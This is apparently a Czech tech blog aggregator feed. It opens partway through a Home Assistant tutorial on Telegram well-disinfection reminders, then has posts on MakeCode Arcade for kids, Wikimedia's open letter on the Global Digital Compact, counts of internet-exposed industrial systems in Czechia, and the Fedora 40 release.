V tuto chvíli se mi pravidelně, každou hodinu zvýší hodnota pomocníka counter.spotreba_vody_od_posledni_dezinfekce. Vytvořil jsem další automatizaci, kterou spouští můj příchod domů. Pokud přijdu domů a hodnota pomocníka je větší než nastavená hodnota, přijde mi zpráva do telegramu. Udělal jsem to z toho důvodu, že těsně po příchodu mám většinou chvilku na nalití dezinfekce. Notifikace mi totiž nevyrušuje z žádné jiné činnosti, jako by tomu bylo při odeslání v určitý časový interval nebo pokud by se odeslala ihned po překročení stanoveného množství vody.

V následujícím YAML kódu budete potřebovat upravit spouštěč, nejspíš u vás doma nebude existovat person.tom. Dále nahraďte číslo „123456789“ vaším konkrétním chat ID pro Telegram robota. Více informací o Telegram robotu najdete v článku Jak propojit Home Assistant a Telegram.

alias: Bot - dezinfekce studny
description: Pokud spotřeba vody přesáhne stanovenou hodnotu, odešli upomínku na telegram
trigger:
- platform: zone
entity_id: person.tom
zone: zone.home
event: enter
condition:
- condition: numeric_state
entity_id: counter.spotreba_vody_od_posledni_dezinfekce
above: 10000
action:
- service: telegram_bot.send_message
data:
inline_keyboard:
- Hotovo:/provedena-dezinfekce-studny
target:
- 123456789
title: "*Nalít savo do studny*"
message: >-
Poslední dezinfekce provedena dne
{{states('input_datetime.dezinfekce_studny') }}
mode: single
Zprávy v aplikaci Telegram, které odesílá naše chytrá domácnostZprávy v aplikaci Telegram, které mě upozorní na potřebu další dezinfekce studny

Krok 5 – potvrzení provedení dezinfekce

Jak jste si určitě všimli, telegramová zpráva obsahuje nejen informaci, kdy jsem naposledy provedl dezinfekci, ale také tlačítko „Hotovo“, díky kterému vynuluji počítadlo, zaznamenám datum poslední dezinfekce a nakonec i smažu zprávu s tlačítkem, protože v historii chatu nemusí překážet.

Těchto několik provedených akci, je lépe vidět z následujícího obrázku:

Náhled na automatizaci, vytvořenou v Home Assistant

YAML kód mé automatizace vypadá takto:

alias: Provedena dezinfekce studny
description: Resetuje počítadlo celkové spotřeby vody a nastaví datum resetu
trigger:
- platform: event
event_type: telegram_callback
event_data:
command: /provedena-dezinfekce-studny
condition: []
action:
- service: counter.reset
metadata: {}
data: {}
target:
entity_id: counter.spotreba_vody_od_posledni_dezinfekce
- service: input_datetime.set_datetime
metadata: {}
data:
datetime: "{{ now().strftime('%Y-%m-%d %H:%M:%S') }}"
target:
entity_id: input_datetime.dezinfekce_studny
- service: telegram_bot.delete_message
metadata: {}
data:
message_id: "{{ trigger.event.data.message.message_id }}"
chat_id: "{{ trigger.event.data.chat_id }}"
mode: single

A to je vše. Než jsem článek dopsal, vyšla květnová aktualizace Home Assistant, která umožňuje vytváření pomocníků rovnou v průběhu psaní samotné automatizace, ale při postupu podle návodu nejspíš tuto novou vychytávku nevyužijete.

The post Pravidelná dezinfekce studny – užitečné automatizace appeared first on TátaGeek.blog.

Maker Faire 2024

03.
května
RoboDoupě

O víkendu 11. a 12. května se bude v Křižíkových pavilonech konat již 7. ročník festivalu všech bastlířů, kutilů, inovátorů a nadšenců – Maker Faire Prague. RoboDoupě při tom pochopitelně nemůže a nebude chybět.

Tento festival je již u nás dostatečně známý, takže ho představovat nebudu. Pokud ale náhodou nevíte o co jde, koukněte [...]

Děti programují hry na konzoli

Již mnohokrát jsem se vyznával, že jsem se k počítačům dostal přes hry. Na jejich tvorbu jsem však neměl schopnosti. Ovšem i cesta k nim byla v dobách osmibitů (jako C64) obtížnější. Nicméně nutkání mě nikdy úplně neopustilo. Dlouho jsem měl v hledáčku pygame respektive knihu Making Games with Python & Pygame. Osobně jsem se k tomu nikdy nedostal, ale s vedením kroužku programování jsem o tom opět začal uvažovat. Zatím sobě a hlavně dětem nehodlám písmenkovými programovacími jazyky komplikovat život a zůstanu u blokových jazyků. Naštěstí taková varianta existuje a tu vám chci přiblížit. Jedná se o dialekt Microbitu. Navíc jsou na trhu k dispozici i fyzické herní konzole, kde si vlastní výtvory můžete doslova osahat.

Úvod

Zásluhy je třeba připsat Martinu Malému a jeho knize Micro:bit krok za krokem, kde jsem se o dané možnosti dozvěděl. Šikovně mě navnadil hardwarem, konkrétně konzolí Retro Arcade od firmy Elecfreaks. Jejich výrobky můžete znát z minulého příspěvku Microbit robůtek Cutebot s joystickem. Seznam podporovaných výrobců hardware je však mnohem delší.

Jak už bylo řečeno, jedná se o dialekt Microbitu a editor naleznete na MakeCode Arcade. Kromě editoru je tam především velkém množství tutoriálů včetně předpřipravených assetů (rozuměj pozadí a postav alias spritů). Tutoriály mají podobu jednak v editoru, jednak souhrnou stránku pro učitele (zde například Mama Dino).

Didaktika

Připravené materiály vás neomezují v tom, že byste si nemohli kreslit vlastní, ale pomůže vám to ušetřit čas nebo vyřešit výtvarné zábrany žáků. Velmi kladně hodnotím, že tutoriály postupně odhalují jednotlivé bloky (ostatní jsou skryté a nedostupné), což výrazně pomáhá žáky nezahltit. Tutoriál lze s menší či větší pomocí vyučujícího za hodinu stihnout. K dispozici není český překlad. To nehaním, naopak se mi to didakticky hodí. Po přihlášení k Microsoft nebo Google účtu (žáci pravděpodobně mají alespoň školní) se jednotlivé projekty uloží (s písmenkovými jazyky bych musel učit ještě verzovací systémy).

Tutoriály nebo dopomoc učitele jsou dost návodné. Ale tvorba her je obtížný obor, bez toho si začátek nedokážu představit. Ostatně i dříve jsme opisovali řádek za řádkem z časopisu ABC a snažili se pochopit, o co tam jde.

Později jsem opustil tutoriály a sáhl po materiálu od Elecfreaks, konkrétně Aircraft Battle. Tento návod nemá formu tutoriálu ani připravené assety (kreslíte si vlastní, ale můžete vybrat libovolný kus z galerie). Navíc v projektu pracujete se všemi bloky. To žáky celkem zahltilo, některé podobné se jim pletou. Celkově to hodnotí minimálně o řád složitější.

K samostatnému návrhu vlastní hry jsme se nedostali, snad někdy příště.

Na šest dětí jsem zakoupil jednu konzoli. Kromě emulátor tak mají šanci si svůj výtvor vyzkoušet i naživo.

Závěr

MakeCode Arcade díky blokovému jazyku a dostupným didaktickým materiálům přibližuje tvorbu her velmi dostupnou formou i začátečníkům. Hardwarová konzole zážitek umocní, ale není to nutné, vystačíte i pouze s emulátorem. Pamatujte, že od následování tutoriálu k samostatné tvorbě vlastní hry je to obrovský skok. I z toho důvodu se zase na chvíli vracím ke code.org, abychom změnili druh úloh a žáci samostatně čelili přiměřeným výzvám.

Související

Migrace VPS z VMware na Proxmox

01.
května
Josef Jebavý
Existuje mnoho důvodů, proč migrovat VPS z VMware na Proxmox.... Otázkou je, jak migrovat VPS z VMware na Proxmox. Pokud máte více fyzických serverů, můžete to zkusit postupně. Když máte jeden server, můžete provést připravenou migraci, tak že tento jeden server přeinstalujete. Konkrétní postup, jak migrovat VPS z VMware na Proxmox, se dozvíte v tomto článku.

Co Lukačovič a spol. nechápou

Seznam zavedl placené tarify na své služby a 100% slevu dává těm, kteří se nechají sledovat. V článku se rozepisuju o tom, že jejich nabídka má zásadní vadu: pokud chcete po lidech, aby vám platili, musíte z nich první udělat zákazníky.

Novinářská cena 2023: Známe úzké nominace

29.
dubna
Nadace OSF

Nadace OSF zveřejnila seznam nominovaných na Novinářskou cenu 2023. Do 14. ročníku soutěže nominovala veřejnost a zástupci novinářské obce rekordních 890 příspěvků. Cena se uděluje v celkem 13 kategoriích. Porotci a porotkyně vybírají u 9 z nich vždy tři nejlepší příspěvky, ze kterých vzejde vítěz. V dalších 4 kategoriích se udělují zvláštní ceny. Slavnostní vyhlášení vítězů proběhne 6. května 2024.

(více…)

Wikimedia Česká republika se připojila k otevřenému dopisu, který vyzývá Organizaci spojených národů, aby prostřednictvím Globálního digitálního paktu (Global Digital Compact) chránila otevřené a decentralizované online platformy

29.
dubna
Wikimedia ČR

Dne 23. dubna se Wikimedia Česká republika připojila k Wikimedia Foundation, neziskové organizací provozující projekty Wikimedia, a k dalším 11 pobočkám Wikimedia po celém světě. Otevřeným dopisem vyzvala členské státy Organizace spojených národů (OSN) k ochraně Wikipedie a dalších projektů veřejného zájmu v připravovaném Globálním digitálním paktu (Global Digital Compact).

Globální digitální pakt je doposud nejkomplexnějším pokusem o vytvoření pravidel pro celosvětově sdílený přístup k digitálním technologiím. Tento dokument má být schvalován v září na Summitu budoucnosti.

Zveřejněný dopis zdůrazňuje, jak může komunitně řízený model Wikipedie sloužit jako vzor pro budování lepšího digitálního prostředí, včetně návrhů pro využití nástrojů umělé inteligence a strojového učení. Wikipedii vytváří a spravuje globální komunita více než 265 000 dobrovolných přispěvatelů. Ti se řídí zásadami, které zajišťují, že informace na platformě jsou založeny na faktech, jsou neutrální a vycházejí ze spolehlivých a ověřených zdrojů.

Otevřený dopis požaduje, aby pakt obsahoval tři klíčové závazky, kterými jsou: 

1. Povzbuzovat komunity k zakládání online projektů veřejného zájmu a tyto chránit;

2. Podporovat a chránit veřejné digitální statky podporou svobodného obsahu, z něhož může mít prospěch kdokoliv a kdekoliv;

3. Umělá inteligence a strojové učení by měly podporovat, nikoli nahrazovat lidi, kteří vytvářejí obsah a rozhodují ve veřejném zájmu.

Tyto podmínky dle našeho názoru pomohou zajistit otevřený, interoperabilní (schopnost různých systémů vzájemně spolupracovat) a dostupný internet, který bude zajišťovat podmínky pro fungování projektů veřejného zájmu, jako je Wikipedie, a lidí, kteří tyto projekty vytvářejí.

Otevřený dopis k ochraně Wikipedie a dalších projektů veřejného zájmu v Globálním digitálním paktu

Globální digitální pakt (Global Digital Compact) představuje jedinečnou a významnou příležitost měnit náš digitální svět tak, aby podporoval veřejný zájem a udržitelný rozvoj pro kohokoliv a kdekoliv.


My, signatáři tohoto otevřeného dopisu, vyzýváme členské státy OSN, aby přijaly pozitivní vizi budoucího internetu, který v celosvětovém měřítku podporuje různorodé komunity ve vytváření a provozování bezplatných a otevřených znalostních projektů. Projekty Wikimedia, včetně online encyklopedie Wikipedie, nabízejí světu největší bezplatné, otevřené, mnohojazyčné, mezikulturní a univerzálně přístupné úložiště vzdělávacích materiálů, jaké kdy bylo vytvořeno. Projekty Wikimedia spravované dobrovolníky tvoří komunitně vedený ekosystém, který vyniká integritou nabízených informací. Slouží jako veřejná digitální infrastruktura pro otevřeně licencovaný, neutrální, encyklopedický obsah ve více než 300 jazycích.

Více než dvacetileté zkušenosti z provozování Wikipedie nás naučily, že lidstvu bude nejlépe sloužit internet, který bude otevřený, globální, interoperabilní a všeobecně dostupný. Proto by měly být do textu Globálního digitálního paktu zahrnuty tři základní závazky:

1. Povzbuzovat komunity k zakládání online projektů veřejného zájmu a tyto chránit;

2. Podporovat a chránit veřejné digitální statky podporou svobodného obsahu, z něhož může mít prospěch kdokoliv a kdekoliv;

3. Umělá inteligence a strojové učení by měly podporovat, nikoli nahrazovat lidi, kteří vytvářejí obsah a rozhodují ve veřejném zájmu.     


*       *       *

1. Povzbuzovat komunity k zakládání online projektů veřejného zájmu a chránit je     

Po více než dvě desetiletí dobrovolnické komunity, které ve veřejném zájmu přispívaly     ke svobodným a otevřeným znalostním projektům (jako je Wikipedie podporovaná Wikimedia Foundation), vyvíjely systémy samosprávy umožňující správu a moderaci obsahu. Jejich účelem je zajistit, aby informace vytvářené a sdílené v rámci projektů byly spolehlivé a dobře dostupné.

Současná regulatorní diskuse se často zaměřuje pouze na komerční, shora dolů řízené modely digitální správy. Méně se potom zabývají pozitivním dopadem komunit veřejného zájmu, které fungují v rámci participativních a kolaborativních samosprávných modelů. Komunitně spravovaný digitální prostor umožňuje přispěvatelům ve veřejném zájmu zlepšovat spolehlivost obsahu tím, že navrhuje politiky a postupy vhodné pro daný kontext, které kladou důraz na hodnoty, jako je bezpečnost a inkluzivita.

Příkladem takovéhoto online prostoru jsou projekty Wikimedia. Globální, svobodné a otevřené znalostní projekty, jako je Wikipedie, by neměly být vzácností. Mezinárodní komunita by měla prostřednictvím veřejných politik, financí a dalších zdrojů podporovat svět, kde online komunity řídí a budují vlastní projekty veřejného zájmu tak, aby byly spravedlivé a přispívaly ke zdravému online informačnímu ekosystému.

S vývojem regulace online prostředí musíme zajistit, aby přijaté regulatorní rámce podporovaly rozvoj internetu, ve kterém se daří projektům veřejného zájmu a kde vznikají nové a přístupné oblasti kulturní a vzdělávací výměny budované na etických základech.

2. Podporovat a chránit veřejné digitální statky podporou svobodného obsahu, z něhož může mít prospěch kdokoliv a kdekoli     

Wikipedie a další projekty, které poskytují přístup ke znalostem, jsou digitálním veřejným statkem, jehož základem je svobodný digitální obsah. Tyto projekty podporují přístup k ověřeným a spolehlivým informacím a odborným znalostem, čímž slouží veřejnému zájmu.

Digitální veřejné statky, jako je Wikipedie, závisí na funkčním systému veřejných licencí. 

Na jejich základě by měly být dostupné také informace a znalosti, které vznikly s využitím veřejných prostředků. Veřejné licence by měly být v digitálním věku dále chráněny například tím, že nebudou udělována nová výhradní práva nadigitalizaci již existujících děl.

Platformy budující veřejné digitální statky, jako je Wikipedie a další Wikimedia projekty, navíc podporují vícejazyčné a interkulturní online prostředí, které je stěžejním prvkem v budování inkluzivního online prostředí, a které přispívá k plnění cílů udržitelného rozvoje.

3. Umělá inteligence a strojové učení by měly podporovat, nikoli nahrazovat lidi, kteří vytvářejí obsah a rozhodují ve veřejném zájmu.     

Věříme, že nástroje umělé inteligence a strojového učení mohou uspíšit plnění mnohých cílů udržitelného rozvoje tím, že umožní lidem přístup k ověřeným znalostem. Komunita dobrovolníků na Wikipedii již mnoho let nasazuje systémy strojového učení, které napomáhají správě a moderaci spolehlivých informací. Aby tyto nástroje sloužily veřejnému zájmu, musí být jejich rozvoj zajištěn v souladu s mezinárodními standardy lidských práv. Účast na vývoji těchto nástrojů by měla podléhat transparentním a otevřeným procesům, které řídí ty komunity, kterým mají tyto nástroje pomáhat. V konečném důsledku mohou být systémy umělé inteligence a strojového učení spolehlivé pouze tehdy, učí-li se samy s využitím dobře ozdrojovaných znalostí, vytvářených a řízených lidmi, kteří jsou za své příspěvky náležitě oceněni.


*       *       *

Rozvinutí plného potenciálu internetu – internetu, který umožňuje spolupráci, rozšiřuje přístup ke znalostem a napomáhá společenskému pokroku – závisí na společné snaze vlád, tvůrců politik a občanské společnosti o ochranu prostoru veřejného zájmu na internetu.               

Globální digitální pakt musí chránit to nejlepší z toho, co již internet nabízí: online komunity fungující na základě vzájemné spolupráce, online prostředí chránící lidská práva a platformy vedené dobrovolníky, díky nimž jsou digitální veřejné statky – včetně různorodých a ověřených znalostí – přístupné komukoliv a kdekoliv na světě.

Podepsáni:

Wikimedia Česká republika

Wikimedia Foundation

Wikimedia Austrálie

Wikimedia Brazílie

Uživatelská skupina Wikimedia karibského regionu

Wikimedia Chile

Wikimedia Gruzie

Wikimedia Německo

Wikimedia Ghana

Wikimedia Nigérie

Wikimedia Spojené království

Wikimedia Švédsko

The post Wikimedia Česká republika se připojila k otevřenému dopisu, který vyzývá Organizaci spojených národů, aby prostřednictvím Globálního digitálního paktu (Global Digital Compact) chránila otevřené a decentralizované online platformy first appeared on Wikimedia ČR - blog.

ESP8266 prakticky aneb jak jsem vynalézal kolo a vy už byste nemuseli

26.
dubna
RoboDoupě

Rozhodl jsem se, že spotřebuji nějaké ESP8266-12, které jsem si poháněn skromností v dobré víře před delší dobou objednal a nakoupil, ale dosud nepoužil. Tehdejší cena byla výrazně nižší než u Arduino NANO, které zatím používám nejčastěji. Vždyť to přece jistě není nic těžkého, všechno je popsané a návodů je dostatečně. Stačí použít programátor, [...]

#29 – Jak lidské tělo poznamená půlroční pobyt na vesmírné stanici?

„Působí na ně mikrogravitace, z toho vyplývají negativní efekty na lidské tělo. Jedním z nich je svalová atrofie, což znamená, že postupně dochází k úbytku svalové hmoty. Stejně tak dochází k úbytku hustoty kostí, hlavně u nohou a zad. Může docházet k nepříznivým efektům na kardiovaskulární systém, případně i ke změnám stavby srdce. To si můžeme představit jako zmenšení komor a předsíní. Dalším nepříznivým efektem na astronauty na ISS a obecně na vesmírných misích je radiace. Jsou vystaveni většímu množství radiace než populace na zemi, což znamená, že mají vyšší riziko rakoviny.“

Představte si, že má váš pracovní den 16 hodin, slunce vyjde každých 90 minut a teplota  pracovního prostředí se pohybuje od minus 156 do plus 121 stupňů Celsia. Že takovou práci na inzertních portálech příliš nevidíte? Není divu, stát se astronautem totiž vyžaduje víc než zaslání motivačního dopisu. A když už se do tohoto výběrového klubu podíváte a opustíte zemskou atmosféru, bojujete každý den s negativními vlivy na vaše tělo. Je přitom dost možné, že se díky vesmírné turistice dostane do kosmu mnohem více lidí, než tomu bylo doteď. Aby vědci lépe pochopili, jak velký stres musí snášet lidská těla ve vesmíru, zkoumají je velmi pečlivě už na Zemi. K takovým testům se dostal Dominik Bachratý, student Centra sportovních aktivit VUT, který měl možnost otestovat profesionálního pilota gripenů Aleše Svobodu, prvního českého záložního astronauta Evropské kosmické agentury. Jak se projeví na astronautech půl roku života na vesmírné stanici? A co se od nich můžou přiučit obyčejní smrtelníci?

Průmyslové systémy dostupné z internetu v ČR

24.
dubna
Jan Kopriva

V pondělí jsem publikoval krátký článek věnovaný překvapivě vysokým počtům průmyslových systémů, resp. systémů komunikujících s pomocí standardních průmyslových protokolů, které jsou volně přístupné z internetu. Vzhledem k tomu, že tento článek se nicméně věnoval převážně celosvětové situaci, říkal jsem si, že by mohlo být zajímavé doplnit jej i o aktuální pohled na počty těchto systémů v České republice. Ten tak najdete níže.

Jak ukazuje následující graf, organizace Shadowserver Foundation v současnosti v ČR eviduje cca 450 průmyslových systémů, platformy Censys a Shodan pak udávají počty přes 1000, resp. přes 1100.

Počty průmyslových systémů detekovaných různými skenery v dubnu 2024

Mezi průmyslovými protokoly, kterými dostupné systémy komunikují, je pak dle platforem Censys a Shodan jednoznačně nejčastější Modbus - Shodan aktuálně eviduje přes 400 systémů, které jmenovaný protokol využívají, a Censys jich eviduje dokonce lehce přes 900. Zaznamenaný počet těchto systémů je citelně nižší v datech z Shadowserveru, nicméně vzhledem k tomu, že počet zařízení komunikujících protokolem Modbus je v datech Shadowserveru i celosvětově citelně nižší, než ten evidovaným zbylými dvěma platformami, lze předpokládat, že na vině je omezená schopnost tyto systémy identifikovat ze strany jmenované organizace, spíše než vysoké množství false-positive detekcí ze strany Censysu a Shodanu.

Počty systémů komunikujících různými průmyslovými protokoly detekované různými skenery v dubnu 2024

Níže uvedené grafy ukazují vývoj počtu průmyslových systémů dostupných z internetu v prostředí ČR evidovaného platformou Shodan. Zvláštní zmínku zaslouží, že z prvního grafu je patrné, že za poslední cca 3 roky se tento počet výrazně nezměnil a osciluje okolo hodnoty 1100.

Počty volně dostupných průmyslových systémů detekovaných v ČR od roku 2019 do současnosti
Zdroj: Shodan

Počty volně dostupných průmyslových systémů detekovaných v ČR od roku 2019 do současnosti - Modbux
Zdroj: Shodan

Počty volně dostupných průmyslových systémů detekovaných v ČR od roku 2019 do současnosti - S7
Zdroj: Shodan

Počty volně dostupných průmyslových systémů detekovaných v ČR od roku 2019 do současnosti - BACnet
Zdroj: Shodan

Počty volně dostupných průmyslových systémů detekovaných v ČR od roku 2019 do současnosti - Lantronix
Zdroj: Shodan

Počty volně dostupných průmyslových systémů detekovaných v ČR od roku 2019 do současnosti - KNXnet
Zdroj: Shodan

Vyšla Fedora 40!

Na stránkách fedoramagazine.org bylo oficiálně oznámeno vydání Fedory 40. Ve finální verzi vychází pět oficiálních edic: Workstation pro desktopové, Server pro serverové, Fedora Cloud pro cloudové nasazení, IoT pro internet věcí a Fedora CoreOS pro ty, kteří preferují neměnné systémy. Vedle nich je k dispozici také vznikající edice Silverblue a alternativní desktopy, např. KDE Plasma, Xfce nebo LxQt, a k tomu laby – upravené vydání Fedory například pro designery, robotiku, vědecké použití atd. Novinkou jsou Fedora Atomic Desktops, což je společná značka pro desktopy používající neměnné systémy (kromě Silverblue a Kionite, které si ponechaly svoji vlastní značku). Můžete tedy začít stahovat a instalovat!

Stažení

Ke stažení jsou k dispozici jak oficiální edice, tak i spiny, laby a ARM verze. V prvních hodinách po vydání mohou být servery přetížené. V takovém případě můžete stahovat pomocí torrentů. Vizte také stránku Jak stáhnout. Uživatelům Windows a macOS se na getfedora.org ke stažení nabízí místo obrazu Fedora Media Writer, jednoduchý nástroj, který jim pomůže vybrat verzi Fedory, stáhne ji a nahraje na vybraný USB flash disk. Uživatelům Linuxu jsou i nadále primárně nabízeny přímo obrazy.

Vytvoření instalačního média

Obraz vám pomůže na USB flash disk nahrát a instalační médium vytvořit již zmiňovaný Fedora Media Writer. Verze pro Windows a macOS naleznete přímo na getfedora.org. Uživatelé Fedory jej mohou nalézt v GNOME Software nebo v balíčku s názvem mediawriter. Uživatelé ostatních distribucí si mohou stáhnout verzi pro Flatpak. U Fedora Media Writeru není potřeba obraz dopředu stahovat (i když i to je možné), ale můžete jej stáhnout pomocí něj. Žádný jiný nástroj (kromě dd) se nedoporučuje, protože s ním není Fedora oficiálně testovaná. Chcete-li obraz vypálit na DVD, můžete použít třeba program Brasero nebo v Nautilu kliknout pravým tlačítkem na obraz a dát Zapsat na disk.

Upgrade

Uživatelům Fedora Workstation bude upgrade nabídnut přes GNOME Software. Během několika dní po vydání by se měl na obrazovce Aktualizace objevit panel, který jim upgrade na novou verzi nabídne. Měli by o tom být informováni také upozorněním. Celou věc můžete uspíšit tak, že na obrazovce Aktualizace kliknete tlačítko v levém horním rohu, které vyvolá okamžitou aktualizaci metadat. Chcete-li upgradovat v příkazové řádce, použijte plugin pro DNF. Nainstalujte balíček dnf-plugin-system-upgrade a spusťte proces příkazem sudo dnf system-upgrade download --releasever=40. Může se stát, že některý balíček není upgradovatelný a DNF odmítne systém upgradovat. V takovém případě přidejte parametr --allowerasing. Po úspěšném dokončení, spustíte samotný proces upgradu příkazem sudo dnf system-upgrade reboot. Více informací naleznete v instrukcích k upgradu.

Pro upgrade můžete použít taky neoficiální nástroj fedora-upgrade, který je vyvíjený Mirkem Suchým a který umožňuje upgrade za plného běhu systému a jehož balíček naleznete v repozitářích. Jedná se ovšem o oficiálně netestovaný nástroj, který je určený pouze pro uživatele, kteří ví, co dělají.

Máte-li již nainstalovanou předfinální Fedoru 40 (např. betu), nemusíte provádět upgrade, stačí aktualizovat balíčky ať už pomocí GNOME Software nebo DNF.

Používáte-li stále Fedoru 38, vězte, že její podpora skončí za měsíc. Chcete-li i nadále dostávat bezpečnostní aktualizace, upgradujte v následujících několika týdnech. Používáte-li Fedoru 39, máte podporu zajištěnou ještě zhruba sedm měsíců.

Co je nového

  • Fedora 40 Workstation obsahuje desktopové prostředí GNOME 46. To přináší podporu pro OneDrive ve správci souborů Nautilus, vzdálené přihlášení přes RDP nebo přepracovaná desktopová upozornění.
  • Fedora 40 KDE Plasma Spin přichází s šestou generací KDE Plasma Desktop. Ta má lepší podporu pro Wayland, částečnou podporu pro HDR a také vylepšené téma vzhledu.
  • Pokud se chcete ponořit do strojového učení a AI, vězte, že Fedora nově obsahuje nástroj PyTorch. Zatím umí běžet pouze na CPU, ale připravuje se podpora GPU a NPU.

Pomoc

Máte-li s instalací či upgradem Fedory problémy, obraťte se na české fórum Fedory nebo diskusní skupinu na Telegramu. Před tím, než se pustíte do instalace nebo upgradu, si prostudujte známé problémy.

Release party

Připravuje se release party v Praze, která by se měla uskutečnit v květnu. Přesné datum bude oznámeno.